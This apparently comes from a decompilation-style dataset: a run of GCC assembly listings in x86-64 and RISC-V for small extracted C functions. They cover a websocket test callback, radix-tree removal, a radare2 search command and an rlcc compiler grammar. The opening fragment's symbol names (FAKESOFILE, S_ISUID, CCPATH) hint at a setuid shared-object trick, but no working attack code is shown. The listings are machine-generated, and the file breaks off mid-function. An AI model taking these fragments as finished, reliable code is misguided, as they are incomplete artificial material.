call cleanup@plt j .L6 .L31: ld a1,0(s1) lla a0,.LC2 call printf@plt li a0,1 call cleanup@plt j .L3 .L34: lla a0,.LC8 call puts@plt li a0,1 call cleanup@plt j .L8 .L38: call __stack_chk_fail@plt .size main, .-main .globl X_OK .globl S_ISUID .globl SRCFILE .globl SOFILE .globl R_OK .globl PATH .globl FAKESOFILE .globl CCPATH .bss .align 3 .set .LANCHOR0,. + 0 .type PATH, @object .size PATH, 8 PATH: .zero 8 .type S_ISUID, @object .size S_ISUID, 4 S_ISUID: .zero 4 .type X_OK, @object .size X_OK, 4 X_OK: .zero 4 .type CCPATH, @object .size CCPATH, 8 CCPATH: .zero 8 .type SRCFILE, @object .size SRCFILE, 8 SRCFILE: .zero 8 .type SOFILE, @object .size SOFILE, 8 SOFILE: .zero 8 .type R_OK, @object .size R_OK, 4 R_OK: .zero 4 .type FAKESOFILE, @object .size FAKESOFILE, 4 FAKESOFILE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_unit_test.c_cb_ws_client1_aug_v3_1
.file "extr_unit_test.c_cb_ws_client1_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "CONTROL:" .LC1: .string "" .LC2: .string "%s%.2x:[%.*s]" .text .p2align 4 .type cb_ws_client1, @function cb_ws_client1: .LFB25: .cfi_startproc endbr64 pushq %rbx .cfi_def_cfa_offset 16 .cfi_offset 3, -16 movq %rdi, %rbx subq $16, %rsp .cfi_def_cfa_offset 32 movq %fs:40, %rax movq %rax, 8(%rsp) movl MG_EV_WEBSOCKET_CONTROL_FRAME(%rip), %eax cmpl %esi, MG_EV_WEBSOCKET_FRAME(%rip) je .L2 cmpl %eax, %esi je .L13 cmpl %esi, MG_EV_CLOSE(%rip) je .L14 cmpl %esi, MG_EV_WEBSOCKET_HANDSHAKE_DONE(%rip) je .L15 .p2align 4,,10 .p2align 3 .L1: movq 8(%rsp), %rax subq %fs:40, %rax jne .L16 addq $16, %rsp .cfi_remember_state .cfi_def_cfa_offset 16 popq %rbx .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L2: .cfi_restore_state cmpl %eax, %esi leaq .LC0(%rip), %rcx movl (%rdx), %r10d movl 8(%rdx), %r9d leaq .LC1(%rip), %rax movq $0, (%rsp) movl 16(%rdx), %r8d cmovne %rax, %rcx .L5: movq %rsp, %rdi subq $8, %rsp .cfi_def_cfa_offset 40 xorl %esi, %esi pushq %r10 .cfi_def_cfa_offset 48 leaq .LC2(%rip), %rdx call mg_asprintf@PLT movq 16(%rsp), %rsi movq (%rbx), %rdi movl %eax, %edx call mbuf_append@PLT movq 16(%rsp), %rdi call free@PLT popq %rax .cfi_def_cfa_offset 40 popq %rdx .cfi_def_cfa_offset 32 jmp .L1 .p2align 4,,10 .p2align 3 .L13: movl (%rdx), %r10d movl 8(%rdx), %r9d movq $0, (%rsp) leaq .LC0(%rip), %rcx movl 16(%rdx), %r8d jmp .L5 .p2align 4,,10 .p2align 3 .L15: movl $1, s_ws_client1_connected(%rip) jmp .L1 .p2align 4,,10 .p2align 3 .L14: movl $0, s_ws_client1_connected(%rip) jmp .L1 .L16: call __stack_chk_fail@PLT .cfi_endproc .LFE25: .size cb_ws_client1, .-cb_ws_client1 .globl s_ws_client1_connected .bss .align 4 .type s_ws_client1_connected, @object .size s_ws_client1_connected, 4 s_ws_client1_connected: .zero 4 .globl MG_EV_WEBSOCKET_HANDSHAKE_DONE .align 4 .type MG_EV_WEBSOCKET_HANDSHAKE_DONE, @object .size MG_EV_WEBSOCKET_HANDSHAKE_DONE, 4 MG_EV_WEBSOCKET_HANDSHAKE_DONE: .zero 4 .globl MG_EV_WEBSOCKET_FRAME .align 4 .type MG_EV_WEBSOCKET_FRAME, @object .size MG_EV_WEBSOCKET_FRAME, 4 MG_EV_WEBSOCKET_FRAME: .zero 4 .globl MG_EV_WEBSOCKET_CONTROL_FRAME .align 4 .type MG_EV_WEBSOCKET_CONTROL_FRAME, @object .size MG_EV_WEBSOCKET_CONTROL_FRAME, 4 MG_EV_WEBSOCKET_CONTROL_FRAME: .zero 4 .globl MG_EV_CLOSE .align 4 .type MG_EV_CLOSE, @object .size MG_EV_CLOSE, 4 MG_EV_CLOSE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_unit_test.c_cb_ws_client1_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "CONTROL:" .align 3 .LC1: .string "" .align 3 .LC2: .string "%s%.2x:[%.*s]" .text .align 1 .type cb_ws_client1, @function cb_ws_client1: lla a5,.LANCHOR0 addi sp,sp,-48 lw a4,4(a5) sd s1,24(sp) la s1,__stack_chk_guard sd s0,32(sp) ld a3, 0(s1) sd a3, 8(sp) li a3, 0 sd ra,40(sp) lw a3,0(a5) mv s0,a0 beq a4,a1,.L2 beq a1,a3,.L9 lw a4,8(a5) beq a4,a1,.L13 lw a4,16(a5) bne a4,a1,.L1 li a4,1 sw a4,12(a5) j .L1 .L9: lla a3,.LC0 .L3: lw a6,0(a2) lw a5,8(a2) lw a4,16(a2) li a1,0 lla a2,.LC2 mv a0,sp sd zero,0(sp) call mg_asprintf@plt mv a2,a0 ld a1,0(sp) ld a0,0(s0) call mbuf_append@plt ld a0,0(sp) call free@plt .L1: ld a4, 8(sp) ld a5, 0(s1) xor a5, a4, a5 li a4, 0 bne a5,zero,.L14 ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) addi sp,sp,48 jr ra .L2: beq a4,a3,.L9 lla a3,.LC1 j .L3 .L13: sw zero,.LANCHOR0+12,a5 j .L1 .L14: call __stack_chk_fail@plt .size cb_ws_client1, .-cb_ws_client1 .globl s_ws_client1_connected .globl MG_EV_WEBSOCKET_HANDSHAKE_DONE .globl MG_EV_WEBSOCKET_FRAME .globl MG_EV_WEBSOCKET_CONTROL_FRAME .globl MG_EV_CLOSE .bss .align 2 .set .LANCHOR0,. + 0 .type MG_EV_WEBSOCKET_CONTROL_FRAME, @object .size MG_EV_WEBSOCKET_CONTROL_FRAME, 4 MG_EV_WEBSOCKET_CONTROL_FRAME: .zero 4 .type MG_EV_WEBSOCKET_FRAME, @object .size MG_EV_WEBSOCKET_FRAME, 4 MG_EV_WEBSOCKET_FRAME: .zero 4 .type MG_EV_CLOSE, @object .size MG_EV_CLOSE, 4 MG_EV_CLOSE: .zero 4 .type s_ws_client1_connected, @object .size s_ws_client1_connected, 4 s_ws_client1_connected: .zero 4 .type MG_EV_WEBSOCKET_HANDSHAKE_DONE, @object .size MG_EV_WEBSOCKET_HANDSHAKE_DONE, 4 MG_EV_WEBSOCKET_HANDSHAKE_DONE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_rax.c_raxRemove_aug_v3_7
.file "extr_rax.c_raxRemove_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "### Delete: %.*s\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "Key deleted in node without children. Cleanup needed.\n" .align 8 .LC2: .string "Freeing child %p [%.*s] key:%d\n" .align 8 .LC3: .string "Unlinking child %p from parent %p\n" .section .rodata.str1.1 .LC4: .string "After removing %.*s:\n" .LC5: .string "Compression may be needed" .LC6: .string "Seek start node\n" .LC7: .string "Going up to" .LC8: .string "New node" .section .rodata.str1.8 .align 8 .LC9: .string "Compressed %d nodes, %d total bytes\n" .text .p2align 4 .globl raxRemove .type raxRemove, @function raxRemove: .LFB25: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movq %rdx, %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 movq %rcx, %r14 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rsi, %r12 movl %edx, %esi pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rdi, %rbx leaq .LC0(%rip), %rdi subq $88, %rsp .cfi_def_cfa_offset 144 movq %fs:40, %rax movq %rax, 72(%rsp) xorl %eax, %eax leaq 56(%rsp), %rbp movl %edx, 16(%rsp) movq %r12, %rdx leaq 48(%rsp), %r13 call debugf@PLT movq %rbp, %rdi call raxStackInit@PLT subq $8, %rsp .cfi_def_cfa_offset 152 movq %rbx, %rdi xorl %r8d, %r8d movl $0, 52(%rsp) movq %r13, %rcx movq %r15, %rdx movq %r12, %rsi pushq %rbp .cfi_def_cfa_offset 160 leaq 60(%rsp), %r9 call raxLowWalk@PLT popq %r10 .cfi_def_cfa_offset 152 popq %r11 .cfi_def_cfa_offset 144 movq 48(%rsp), %rdi cmpq %rax, %r15 je .L3 movl (%rdi), %r9d testl %r9d, %r9d jne .L66 .L3: cmpq $0, 8(%rdi) je .L4 testq %r14, %r14 je .L7 call raxGetData@PLT movq 48(%rsp), %rdi movq %rax, (%r14) .L7: movl 16(%rdi), %eax movq $0, 8(%rdi) subl $1, 12(%rbx) testl %eax, %eax je .L67 cmpl $1, %eax je .L19 .L10: movq %rbp, %rdi call raxStackFree@PLT movl $1, %eax .L1: movq 72(%rsp), %rdx subq %fs:40, %rdx jne .L68 addq $88, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L66: .cfi_restore_state movl 44(%rsp), %r8d testl %r8d, %r8d je .L3 .L4: movq %rbp, %rdi call raxStackFree@PLT xorl %eax, %eax jmp .L1 .p2align 4,,10 .p2align 3 .L67: leaq .LC1(%rip), %rdi call debugf@PLT movq 48(%rsp), %r15 cmpq (%rbx), %r15 je .L10 movq 8(%r15), %r8 leaq .LC2(%rip), %r14 jmp .L13 .p2align 4,,10 .p2align 3 .L69: movl (%rax), %esi testl %esi, %esi jne .L12 cmpl $1, 16(%rax) jne .L11 .L12: cmpq (%rbx), %r15 je .L11 .L13: movq 24(%r15), %rcx movl 16(%r15), %edx movq %r15, %rsi movq %r14, %rdi xorl %eax, %eax call debugf@PLT movq %r15, %rdi call rax_free@PLT subl $1, 8(%rbx) movq %rbp, %rdi movq %r15, 8(%rsp) call raxStackPop@PLT movq 8(%rax), %r8 movq %rax, 48(%rsp) movq %rax, %r15 testq %r8, %r8 je .L69 .L11: movq 8(%rsp), %r14 movq %r15, %rdx leaq .LC3(%rip), %rdi xorl %eax, %eax movq %r14, %rsi call debugf@PLT movq 48(%rsp), %rdi movq %r14, %rsi call raxRemoveChild@PLT movq 48(%rsp), %rdx movq %rax, 64(%rsp) cmpq %rdx, %rax je .L14 movq %rbp, %rdi call raxStackPeek@PLT movq %rax, %rdi testq %rax, %rax je .L70 movq 48(%rsp), %rsi call raxFindParentLink@PLT movq %rax, %rdi .L16: movl $8, %edx leaq 64(%rsp), %rsi call memcpy@PLT movq 64(%rsp), %rdx .L14: cmpl $1, 16(%rdx) jne .L10 cmpq $0, 8(%rdx) jne .L10 movq %rdx, 48(%rsp) .p2align 4,,10 .p2align 3 .L19: cmpq $0, 56(%rsp) jne .L10 movl 16(%rsp), %esi movq %r12, %rdx leaq .LC4(%rip), %rdi xorl %eax, %eax leaq .LC7(%rip), %r12 call debugf@PLT movq 48(%rsp), %rsi leaq .LC5(%rip), %rdi call debugnode@PLT leaq .LC6(%rip), %rdi xorl %eax, %eax call debugf@PLT jmp .L23 .p2align 4,,10 .p2align 3 .L71: cmpq $0, 8(%rax) jne .L21 movl (%rax), %ecx testl %ecx, %ecx jne .L22 cmpl $1, 16(%rax) jne .L21 .L22: movq %r15, %rsi movq %r12, %rdi movq %r15, 48(%rsp) call debugnode@PLT .L23: movq %rbp, %rdi call raxStackPop@PLT movq %rax, %r15 testq %rax, %rax jne .L71 .L21: movq 48(%rsp), %rdi movslq 16(%rdi), %r12 movq %rdi, 16(%rsp) testl %r12d, %r12d je .L10 movl $2, %r14d jmp .L28 .p2align 4,,10 .p2align 3 .L72: cmpl $1, %eax jne .L24 leaq 1(%r12), %rdx cmpq RAX_NODE_MAX_SIZE(%rip), %rdx ja .L24 .L37: addl $1, %r14d movq %rdx, %r12 .L28: leal -1(%r14), %eax movl %eax, 8(%rsp) call raxNodeLastChildPtr@PLT movq %r13, %rdi movl $8, %edx movq %rax, %rsi call memcpy@PLT movq 48(%rsp), %rdi cmpq $0, 8(%rdi) jne .L24 movl (%rdi), %edx movl 16(%rdi), %eax testl %edx, %edx je .L72 movslq %eax, %rdx addq %r12, %rdx cmpq RAX_NODE_MAX_SIZE(%rip), %rdx ja .L24 movl %r14d, 8(%rsp) testl %eax, %eax jne .L37 .L27: movq %rdx, %rdi movq %rdx, 24(%rsp) call raxPadding@PLT movq 24(%rsp), %rdx cltq leaq 48(%rdx,%rax), %rdi call rax_malloc@PLT movq 24(%rsp), %rdx testq %rax, %rax movq %rax, 64(%rsp) movq %rax, %rsi je .L10 movl %edx, 16(%rax) movq 16(%rsp), %rdx movl $1, (%rax) movl 16(%rdx), %r9d movq $0, 8(%rax) movq $0, 32(%rax) movq %rdx, 48(%rsp) addl $1, 8(%rbx) testl %r9d, %r9d je .L30 xorl %r12d, %r12d jmp .L34 .p2align 4,,10 .p2align 3 .L73: cmpl $1, %r9d jne .L64 .L33: movq 64(%rsp), %rsi .L34: movq 24(%rdx), %r10 movq 24(%rsi), %rax movl %r9d, %edx movq %r10, %rsi leaq (%rax,%r12,8), %rdi call memcpy@PLT movq 48(%rsp), %rdi movslq 16(%rdi), %rax addq %rax, %r12 call raxNodeLastChildPtr@PLT movq 48(%rsp), %r14 movl $8, %edx movq %r13, %rdi movq %rax, %rsi call memcpy@PLT movq %r14, %rdi call rax_free@PLT movq 48(%rsp), %rdx subl $1, 8(%rbx) cmpq $0, 8(%rdx) jne .L64 movl (%rdx), %eax movl 16(%rdx), %r9d testl %eax, %eax je .L73 testl %r9d, %r9d jne .L33 .L64: movq 64(%rsp), %rsi movl %r12d, %r9d .L30: leaq .LC8(%rip), %rdi movl %r9d, 24(%rsp) call debugnode@PLT movq 64(%rsp), %rdi call raxNodeLastChildPtr@PLT movl $8, %edx movq %r13, %rsi movq %rax, %rdi call memcpy@PLT testq %r15, %r15 movl 24(%rsp), %r9d je .L35 movq 16(%rsp), %rsi movq %r15, %rdi call raxFindParentLink@PLT leaq 64(%rsp), %rsi movl $8, %edx movq %rax, %rdi call memcpy@PLT movl 24(%rsp), %r9d .L36: movl 8(%rsp), %esi movl %r9d, %edx leaq .LC9(%rip), %rdi xorl %eax, %eax call debugf@PLT jmp .L10 .p2align 4,,10 .p2align 3 .L24: cmpl $1, 8(%rsp) je .L10 movq %r12, %rdx jmp .L27 .p2align 4,,10 .p2align 3 .L35: movq 64(%rsp), %rax movq %rax, (%rbx) jmp .L36 .p2align 4,,10 .p2align 3 .L70: movq %rbx, %rdi jmp .L16 .L68: call __stack_chk_fail@PLT .cfi_endproc .LFE25: .size raxRemove, .-raxRemove .globl RAX_NODE_MAX_SIZE .bss .align 8 .type RAX_NODE_MAX_SIZE, @object .size RAX_NODE_MAX_SIZE, 8 RAX_NODE_MAX_SIZE: .zero 8 .globl g_aug_volatile_5148 .data .align 4 .type g_aug_volatile_5148, @object .size g_aug_volatile_5148, 4 g_aug_volatile_5148: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_rax.c_raxRemove_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "### Delete: %.*s\n" .align 3 .LC1: .string "Key deleted in node without children. Cleanup needed.\n" .align 3 .LC2: .string "Freeing child %p [%.*s] key:%d\n" .align 3 .LC3: .string "Unlinking child %p from parent %p\n" .align 3 .LC4: .string "After removing %.*s:\n" .align 3 .LC5: .string "Compression may be needed" .align 3 .LC6: .string "Seek start node\n" .align 3 .LC7: .string "Going up to" .align 3 .LC8: .string "New node" .align 3 .LC9: .string "Compressed %d nodes, %d total bytes\n" .text .align 1 .globl raxRemove .type raxRemove, @function raxRemove: addi sp,sp,-160 sd s5,104(sp) sd s8,80(sp) la s5,__stack_chk_guard sext.w s8,a2 ld a5, 0(s5) sd a5, 40(sp) li a5, 0 sd s0,144(sp) sd s1,136(sp) sd s3,120(sp) mv s0,a2 mv s3,a1 mv a2,a1 mv s1,a0 mv a1,s8 lla a0,.LC0 sd ra,152(sp) sd s2,128(sp) sd s4,112(sp) sd s6,96(sp) addi s2,sp,24 mv s6,a3 sd s7,88(sp) sd s9,72(sp) sd s10,64(sp) sd s11,56(sp) call debugf@plt mv a0,s2 call raxStackInit@plt addi s4,sp,16 addi a5,sp,12 mv a6,s2 li a4,0 mv a3,s4 mv a2,s0 mv a1,s3 mv a0,s1 sw zero,12(sp) call raxLowWalk@plt ld a5,16(sp) beq s0,a0,.L3 lw a4,0(a5) bne a4,zero,.L64 .L3: ld a4,8(a5) beq a4,zero,.L4 beq s6,zero,.L7 mv a0,a5 call raxGetData@plt ld a5,16(sp) sd a0,0(s6) .L7: lw a4,12(s1) lw a3,16(a5) sd zero,8(a5) addiw a4,a4,-1 sw a4,12(s1) beq a3,zero,.L65 li a5,1 beq a3,a5,.L19 .L10: mv a0,s2 call raxStackFree@plt li a0,1 .L6: ld a4, 40(sp) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L66 ld ra,152(sp) ld s0,144(sp) ld s1,136(sp) ld s2,128(sp) ld s3,120(sp) ld s4,112(sp) ld s5,104(sp) ld s6,96(sp) ld s7,88(sp) ld s8,80(sp) ld s9,72(sp) ld s10,64(sp) ld s11,56(sp) addi sp,sp,160 jr ra .L64: lw a4,12(sp) beq a4,zero,.L3 .L4: mv a0,s2 call raxStackFree@plt li a0,0 j .L6 .L65: lla a0,.LC1 call debugf@plt ld a5,0(s1) ld s0,16(sp) beq s0,a5,.L10 ld a4,8(s0) lla s7,.LC2 li s9,1 j .L13 .L67: lw a5,0(a0) bne a5,zero,.L12 lw a5,16(a0) bne a5,s9,.L11 .L12: ld a5,0(s1) beq s0,a5,.L11 .L13: ld a3,24(s0) lw a2,16(s0) mv a1,s0 mv a0,s7 call debugf@plt mv a0,s0 call rax_free@plt lw a5,8(s1) mv a0,s2 mv s6,s0 addiw a5,a5,-1 sw a5,8(s1) call raxStackPop@plt ld a4,8(a0) sd a0,16(sp) mv s0,a0 beq a4,zero,.L67 .L11: mv a2,s0 mv a1,s6 lla a0,.LC3 call debugf@plt ld a0,16(sp) mv a1,s6 call raxRemoveChild@plt ld a5,16(sp) sd a0,32(sp) beq a0,a5,.L14 mv a0,s2 call raxStackPeek@plt beq a0,zero,.L68 ld a1,16(sp) call raxFindParentLink@plt .L16: li a2,8 addi a1,sp,32 call memcpy@plt ld a5,32(sp) .L14: lw a3,16(a5) li a4,1 bne a3,a4,.L10 ld a4,8(a5) bne a4,zero,.L10 sd a5,16(sp) .L19: ld a5,24(sp) bne a5,zero,.L10 mv a2,s3 mv a1,s8 lla a0,.LC4 call debugf@plt ld a1,16(sp) lla a0,.LC5 li s6,1 call debugnode@plt lla a0,.LC6 call debugf@plt lla s3,.LC7 j .L23 .L69: ld a5,8(a0) bne a5,zero,.L21 lw a5,0(a0) bne a5,zero,.L22 lw a5,16(a0) bne a5,s6,.L21 .L22: mv a1,s0 mv a0,s3 sd s0,16(sp) call debugnode@plt .L23: mv a0,s2 call raxStackPop@plt mv s0,a0 bne a0,zero,.L69 .L21: ld s8,16(sp) lw s7,16(s8) beq s7,zero,.L10 mv a0,s8 li s3,2 lla s11,.LANCHOR0 li s9,1 j .L28 .L70: bne a5,s9,.L24 ld a5,0(s11) addi s6,s7,1 bgtu s6,a5,.L24 .L37: addiw s3,s3,1 mv s7,s6 .L28: call raxNodeLastChildPtr@plt mv a1,a0 li a2,8 mv a0,s4 call memcpy@plt ld a0,16(sp) addiw s10,s3,-1 ld a5,8(a0) bne a5,zero,.L24 lw a4,0(a0) lw a5,16(a0) beq a4,zero,.L70 ld a4,0(s11) add s6,a5,s7 bgtu s6,a4,.L24 sext.w s10,s3 bne a5,zero,.L37 .L27: mv a0,s6 call raxPadding@plt addi a5,s6,48 add a0,a5,a0 call rax_malloc@plt sd a0,32(sp) mv a1,a0 beq a0,zero,.L10 lw a5,8(s1) sw s6,16(a0) lw s3,16(s8) li a4,1 sw a4,0(a0) sd zero,8(a0) sd zero,32(a0) addiw a5,a5,1 sw a5,8(s1) sd s8,16(sp) beq s3,zero,.L30 mv a5,s8 li s6,0 li s7,1 .L34: ld a0,24(a1) ld a1,24(a5) slli a5,s6,3 mv a2,s3 add a0,a0,a5 call memcpy@plt ld a0,16(sp) lw a5,16(a0) add s6,s6,a5 call raxNodeLastChildPtr@plt ld s3,16(sp) mv a1,a0 li a2,8 mv a0,s4 call memcpy@plt mv a0,s3 call rax_free@plt ld a5,16(sp) lw a4,8(s1) ld a3,8(a5) addiw a4,a4,-1 sw a4,8(s1) bne a3,zero,.L62 lw a4,0(a5) lw s3,16(a5) bne a4,zero,.L32 bne s3,s7,.L62 .L33: ld a1,32(sp) j .L34 .L32: bne s3,zero,.L33 .L62: ld a1,32(sp) sext.w s3,s6 .L30: lla a0,.LC8 call debugnode@plt ld a0,32(sp) call raxNodeLastChildPtr@plt li a2,8 mv a1,s4 call memcpy@plt beq s0,zero,.L35 mv a1,s8 mv a0,s0 call raxFindParentLink@plt li a2,8 addi a1,sp,32 call memcpy@plt .L36: mv a2,s3 mv a1,s10 lla a0,.LC9 call debugf@plt j .L10 .L24: li a5,1 beq s10,a5,.L10 mv s6,s7 j .L27 .L35: ld a5,32(sp) sd a5,0(s1) j .L36 .L68: mv a0,s1 j .L16 .L66: call __stack_chk_fail@plt .size raxRemove, .-raxRemove .globl RAX_NODE_MAX_SIZE .globl g_aug_volatile_5148 .data .align 2 .type g_aug_volatile_5148, @object .size g_aug_volatile_5148, 4 g_aug_volatile_5148: .word 8 .bss .align 3 .set .LANCHOR0,. + 0 .type RAX_NODE_MAX_SIZE, @object .size RAX_NODE_MAX_SIZE, 8 RAX_NODE_MAX_SIZE: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_cmd_zign.c_cmdSearch_aug_v3_7
.file "extr_cmd_zign.c_cmdSearch_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "usage: z/[f*]\n" .LC1: .string "usage: z/[*]\n" .text .p2align 4 .type cmdSearch, @function cmdSearch: .LFB24: .cfi_startproc endbr64 subq $8, %rsp .cfi_def_cfa_offset 16 movzbl (%rsi), %eax cmpb $63, %al je .L2 jg .L3 testb %al, %al je .L7 cmpb $42, %al jne .L5 .L7: xorl %esi, %esi cmpb $42, %al movl $1, %edx sete %sil addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 8 jmp search@PLT .p2align 4,,10 .p2align 3 .L3: .cfi_restore_state cmpb $102, %al jne .L5 movzbl 1(%rsi), %eax testb %al, %al je .L7 cmpb $42, %al je .L7 leaq .LC0(%rip), %rdi call eprintf@PLT movl $1, %eax addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L2: .cfi_restore_state movl help_msg_z_slash(%rip), %esi call r_core_cmd_help@PLT movl $1, %eax addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L5: .cfi_restore_state leaq .LC1(%rip), %rdi call eprintf@PLT movl $1, %eax addq $8, %rsp .cfi_def_cfa_offset 8 ret .cfi_endproc .LFE24: .size cmdSearch, .-cmdSearch .globl help_msg_z_slash .bss .align 4 .type help_msg_z_slash, @object .size help_msg_z_slash, 4 help_msg_z_slash: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_cmd_zign.c_cmdSearch_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "usage: z/[f*]\n" .align 3 .LC1: .string "usage: z/[*]\n" .text .align 1 .type cmdSearch, @function cmdSearch: addi sp,sp,-16 sd ra,8(sp) lbu a5,0(a1) li a3,63 beq a5,a3,.L2 mv a4,a0 bgtu a5,a3,.L3 beq a5,zero,.L4 li a3,42 bne a5,a3,.L5 .L4: ld ra,8(sp) addi a1,a5,-42 li a2,1 seqz a1,a1 mv a0,a4 addi sp,sp,16 tail search@plt .L3: li a3,102 bne a5,a3,.L5 lbu a1,1(a1) beq a1,zero,.L7 li a5,42 beq a1,a5,.L7 lla a0,.LC0 call eprintf@plt ld ra,8(sp) li a0,1 addi sp,sp,16 jr ra .L5: lla a0,.LC1 call eprintf@plt ld ra,8(sp) li a0,1 addi sp,sp,16 jr ra .L2: lw a1,.LANCHOR0 call r_core_cmd_help@plt ld ra,8(sp) li a0,1 addi sp,sp,16 jr ra .L7: ld ra,8(sp) addi a1,a1,-42 li a2,1 seqz a1,a1 mv a0,a4 addi sp,sp,16 tail search@plt .size cmdSearch, .-cmdSearch .globl help_msg_z_slash .bss .align 2 .set .LANCHOR0,. + 0 .type help_msg_z_slash, @object .size help_msg_z_slash, 4 help_msg_z_slash: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_rlcc.c_main_aug_v3_4
.file "extr_rlcc.c_main_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "ident" .LC1: .string "number" .LC2: .string "character" .LC3: .string "string" .LC4: .string "factor" .LC5: .string "term" .LC6: .string "lexp" .LC7: .string "stmt" .LC8: .string "exp" .LC9: .string "vartype" .LC10: .string "typeident" .LC11: .string "decls" .LC12: .string "args" .LC13: .string "body" .LC14: .string "comment" .LC15: .string "linecomment" .LC16: .string "asm" .LC17: .string "procedure" .LC18: .string "cprocedure" .LC19: .string "sigdef" .LC20: .string "sigbody" .LC21: .string "includes" .LC22: .string "smallc" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC23: .ascii " ident : /[a-zA-Z_][a-zA-Z0-9_]*/ ; " .ascii " \n number : /[0-9]+/ ; " .ascii " \n character : /'.'/ ; " .ascii " \n string : /\"(\\\\.|[^\"])*\"/ ; " .ascii " \n " .ascii " \n factor : '(' <le" .ascii "xp> ')' \n |" .ascii " <number> \n " .ascii " | <character> " .ascii " \n | <string> " .ascii " \n | <ident> '(' <lexp>? (',' <lexp>)* '" .ascii ")' \n | <ident> ; " .ascii " \n " .ascii " \n term : <factor> ((" .ascii "'*' | '/' | '%') <factor>)* ; \n lexp : <te" .ascii "rm> (('+' | '-') <term>)* ; \n " .ascii " \n" .ascii " stmt : '{' <stmt>* '}' " .ascii " \n | \"while\" '(' <exp> ')' <stmt> " .ascii " \n | \"if\" '(' <exp> ')' <stmt> " .ascii " \n | <ident> '=' <lexp> ';' " .ascii " \n | \"print\" '(' <" .ascii "lexp>? ')' ';' \n | \"retur" .ascii "n\" <lexp>? ';' \n |" .ascii " <ident> '(' (<number>|<ident>|<string>)? (',' (<string>|<nu" .ascii "mber>|<ident>))* ')' ';' ; \n " .ascii " \n exp : <le" .ascii "xp> '>' <lexp> \n " .ascii " | <lexp> '<' <lexp> \n" .ascii " | <lexp> \">=\" <lexp> " .ascii " \n | <lexp> \"<=\" <lexp> " .ascii " \n | <lexp> \"!=\" <lexp> " .ascii " \n | <lexp> \"==\" <lexp> ; " .ascii " \n " .ascii " " .ascii " \n vartype : (\"int\" | \"char" .ascii "\") ; \n typeident : <vartype>" .ascii " <ident> ; \n decls : (" .ascii "<typeident> ';')* ; \n args " .ascii " : <typeident>? (',' <typeident>)* ; " .ascii "\n body : '{' <decls> <stmt>* '}' ; " .ascii " \n comment : /\\/\\*([^\\*])*\\*\\// ; " .ascii " \n linecomment : /\\/\\/([^\\n])*/ ; " .ascii " \n asm : /\\:([^\\n])*/ ; " .ascii " \n procedure : <ident> '@' \"glob" .ascii "al\" '(' <number>? ')' <body> ; \n cprocedure : <vartype> <i" .ascii "dent> '(' <args> ')' <body> ; \n sigdef : <ident> '@' <id" .ascii "ent> '(" .string "' <number> ')' ';' ; \n sigbody : '@' <ident> '(' <number> ')' ';' ; \n includes : (\"#include\" <string>)* ; \n smallc : /^/ (<comment>|<asm>|<linecomment>|<sigdef>|<sigbody>|<procedure>|<cprocedure>)* <includes> <decls> /$/ ; \n" .section .rodata.str1.1 .LC24: .string "; TAG = %s (%s)\n" .LC25: .string "<stdin>" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function 